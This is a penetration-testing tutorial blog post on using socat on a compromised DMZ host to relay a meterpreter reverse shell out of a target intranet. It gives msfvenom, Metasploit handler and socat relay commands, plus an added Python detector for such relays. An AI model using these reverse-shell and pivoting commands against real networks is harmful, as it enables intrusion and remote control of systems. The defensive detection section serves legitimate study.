how to use socat to penetrate the target intranet more easily

Posted by santillano at 2020-04-11
0x01 Environment Description:

lnmp01 is assumed to be the target's DMZ-segment machine; it will act as the proxy later

Suppose its public IP is 192.168.3.30

Suppose its intranet IP is 192.168.32.167

win7 is assumed to be the target intranet machine

Suppose its intranet IP is 192.168.32.144

Local machine

Suppose the local intranet IP is 192.168.3.15

0x02 some prerequisites to note

The local machine can ping and communicate with lnmp01, and lnmp01 can ping and communicate with win7 in the target intranet

0x03 The ultimate goal is dual-intranet communication, that is, operating the machines in the target intranet from my own intranet. Of course there are many ways to achieve this; some commonly used methods are:

The most traditional way is to run LCX in listen mode on a VPS for forwarding, and then bind to it from the local machine

Alternatively, build a VPN through a VPS: the local machine first joins the VPN intranet, and LCX in tran mode on the VPS then relays traffic through the VPN intranet back to the local machine

Another option is the port-forwarding function of meterpreter. That is carried by the meterpreter tunnel itself, which means you first need a meterpreter shell calling back to you. Since this is not the focus today, it will not be introduced further; if you are interested, dig into it and study it on your own

Moreover, some advanced trojans also come with various built-in intranet proxy functions

Finally, the method explained in detail here: use socat on the target DMZ machine to establish a two-way channel, and then bring out the traffic of all machines in the target intranet through it

...

0x04 implementation idea:

Use the DMZ machine as the proxy -> point the trojan's callback traffic at a designated port on the DMZ machine -> set up a two-way channel between the local machine and the port exposed on the proxy -> the local machine only needs to listen for the trojan's forwarded traffic -> the session comes online successfully

0x05 First install socat on lnmp01. In practice it is recommended to compile and install it from source: when you leave, you can simply delete the whole installation directory, which is cleaner:

# yum install socat -y

0x06 Prepare the reverse payload locally. Note that the callback IP here must be the IP of the machine at the DMZ boundary [lnmp01]

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.30 LPORT=443 -f exe -o /root/shell.exe

0x07 Start the listener locally:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

0x08 Set up the proxy on lnmp01. This binds ports 53 and 443 on lnmp01 together, which is equivalent to building a pipe on that machine: lnmp01 is just an intermediary, so when something connects to its port 53, the data is automatically handed to whatever is connected to its port 443. Since port 443 is where the payload calls back, this naturally produces the online effect:

# nohup socat tcp-listen:53 tcp-listen:443 &

0x09 Now go back to the local machine and establish the two-way channel with the proxy side; it is best to keep it running in the background. This binds local port 443 to port 53 on the proxy. Accessing local port 443 is then equivalent to accessing port 53 on the proxy, and that port is in turn bound to port 443 on the proxy, so when the trojan's traffic bounces back to port 443 it is effectively bounced straight to my local machine:

# nohup socat tcp:192.168.3.30:53 tcp:192.168.3.15:443 &

0x10 Finally, execute the payload on the intranet machine, and the trojan comes online successfully
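From the defender's side, the relay built in 0x08 leaves a recognisable footprint on the DMZ host: one socat process holding two listening sockets at once (53 and 443 here), which no normal service on such a box does. The following is an added example, not part of the original post: it parses constructed `ss -tlnp`-style output and flags processes that run a known relay tool or that bind more than one listening port outside an assumed allow-list of expected services.

```python
import re
from collections import defaultdict

# Constructed sample of `ss -tlnp` output on a DMZ web host (not a real capture).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22        0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    0.0.0.0:80        0.0.0.0:*         users:(("nginx",pid=1044,fd=6))
LISTEN 0      1      0.0.0.0:53        0.0.0.0:*         users:(("socat",pid=2317,fd=5))
LISTEN 0      1      0.0.0.0:443       0.0.0.0:*         users:(("socat",pid=2317,fd=6))
LISTEN 0      80     127.0.0.1:3306    0.0.0.0:*         users:(("mysqld",pid=1190,fd=21))
"""

# One LISTEN row: local addr:port, then the owning process name and pid.
LINE_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(\S+?):(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+),fd=\d+\)\)'
)

RELAY_TOOLS = {"socat"}
# Assumed allow-list of (process, port) pairs this host is expected to serve.
EXPECTED = {("sshd", 22), ("nginx", 80), ("nginx", 443), ("mysqld", 3306)}


def parse_listeners(text):
    """Return a list of (process, pid, port) tuples from ss -tlnp style output."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out.append((m.group(3), int(m.group(4)), int(m.group(2))))
    return out


def find_relays(listeners):
    """Flag PIDs that run a relay tool, or hold 2+ listeners not all on the allow-list."""
    by_pid = defaultdict(list)
    for proc, pid, port in listeners:
        by_pid[(proc, pid)].append(port)
    findings = []
    for (proc, pid), ports in by_pid.items():
        reasons = []
        if proc in RELAY_TOOLS:
            reasons.append("relay tool")
        if len(ports) >= 2 and not all((proc, p) in EXPECTED for p in ports):
            reasons.append("multiple listeners")
        if reasons:
            findings.append({"process": proc, "pid": pid, "ports": sorted(ports), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_relays(parse_listeners(SAMPLE_SS)):
        print(f)
```

The same check can be fed live output (`ss -tlnp`) on a host you manage; the allow-list must be adapted to what that host is supposed to serve.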

0x11 About socat:
An advanced port-forwarding tool for Linux that supports a great many protocols; it can basically replace all the well-known port-forwarding tools on the market

Of course it is not limited to port forwarding; it can also build various tunnels and so on

Since it is not the point today, it will not be explained further here; a detailed write-up may follow later if time allows

0x12 Advantages:
No need to forward through a VPS

Only one boundary machine is needed to bring all the machines in the intranet online

Stable: socat is a regular system tool, easy to use, and well suited to intranet penetration

...

0x13 Disadvantages:
The firewall may block access to the specified ports. Honestly, once you have control of the target machine it is easy to open two ports with iptables; the real worry is other, messier protection

If the real port cannot be exposed at all, the only options are various kinds of port multiplexing, or tunnelling over a lower-layer protocol such as ICMP or UDP